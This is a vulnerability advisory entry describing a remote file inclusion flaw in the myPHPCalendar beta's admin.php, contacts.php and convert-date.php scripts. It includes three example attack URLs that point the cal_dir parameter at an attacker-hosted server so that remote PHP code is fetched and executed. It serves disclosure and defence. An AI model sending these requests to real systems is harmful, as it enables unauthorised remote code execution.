Korean
<< Back
VID 21266
Severity 40
Port 80, ...
Protocol TCP
Class CGI
Detailed Description The myPHPCalendar is vulnerable to a file injection vulnerability due to a flaw in multiple PHP files.
MyPHPCalendar is a freely available calendar program, written in PHP4, that uses a MySQL database for Microsoft Windows, Linux, and Unix-based operating systems. The version 10192000 Build 1 Beta of myPHPCalendar has a flaw that make the remote host include PHP files hosted on a hostile Web server, caused by a flaw in multiple scripts - admin.php, contacts.php, and convert-date.php. An attacker could install malicious PHP files on a hostile server and then use them to execute arbitrary code on the vulnerable system. A remote attacker could send a specially-crafted URL request to the 'admin.php' or 'contacts.php' script that specifies a malicious PHP file on a remote system as a parameter, which could allow to execute arbitrary code on the affected system.

http://[target]/admin.php?cal_dir=http://[attacker]/
http://[target]/contacts.php?cal_dir=http://[attacker]/
http://[target]/convert-date.php?cal_dir=http://[attacker]/

* References:
http://archives.neohapsis.com/archives/vulnwatch/2003-q4/0011.html

* Platforms Affected:
MyPHPCalendar 10192000 Build1 Beta
Linux Any version
Unix Any version
Windows Any version
Recommendation No solution for this vulnerability as of June 2014.
Related URL (CVE)
Related URL (SecurityFocus)
Related URL 13409 (ISS)